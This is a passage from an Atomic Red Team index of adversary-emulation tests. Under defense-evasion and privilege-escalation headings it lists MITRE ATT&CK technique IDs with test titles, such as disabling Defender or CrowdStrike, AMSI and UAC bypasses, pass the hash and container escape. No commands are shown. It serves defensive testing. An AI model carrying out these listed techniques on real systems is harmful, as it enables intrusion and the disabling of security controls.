- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #28: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #29: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #30: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #31: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #32: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #33: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #34: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #35: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
- Atomic Test #38: Clear History [linux]
- Atomic Test #39: Suspend History [linux]
- Atomic Test #40: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #41: Clear Pagging Cache [linux]
- Atomic Test #42: Disable Memory Swap [linux]
- Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #3: Install root CA on macOS [macos]
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos]
- Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos]
- Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.007 Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
